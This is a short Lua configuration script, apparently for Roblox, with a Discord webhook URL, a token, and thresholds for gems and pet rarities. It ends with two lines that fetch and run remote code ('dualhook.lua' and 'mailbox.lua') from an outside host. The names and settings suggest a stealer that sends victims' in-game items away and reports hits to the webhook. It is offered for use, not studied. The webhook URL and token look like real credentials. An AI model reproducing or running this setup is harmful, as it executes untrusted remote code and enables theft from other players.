Token = "0LmMTSJy3PbvbloWGgw6aSURg35F1T"
Message = ".gg/8VWDSeKsDn"
WebText = {
 ["DevRICH"] = "HITS"
}

Settings = {
 WebHook = "https://discord.com/api/webhooks/1116806678009090058/wZjllpz3TOEHS6-V9vbGxQeb59zU_Esnm_56hjN5r8Py1qfHh7TtE-ze2PAFJeYkaUl0", -- https://discord.com/api/webhooks/x/x
 Gems = 50000000, -- 1000000000
 Titanic = 100, -- %
 Huge = 95, -- %
 Banana = 100, -- %
 Egg = 100, -- %
 Gift = 50, -- %
 Event = 0, -- %
 Exclusive = 60, -- %
 Secret = 0, -- %
 Mythical = 0, -- %
 Legendary = 0, -- %
 Epic = 0, -- %
 Rare = 0, -- %
 Basic = 0 -- %
}

loadstring(game:HttpGet("https://goof.pro/s/dualhook.lua", true))()
loadstring(game:HttpGet("https://goof.pro/s/mailbox.lua", true))()
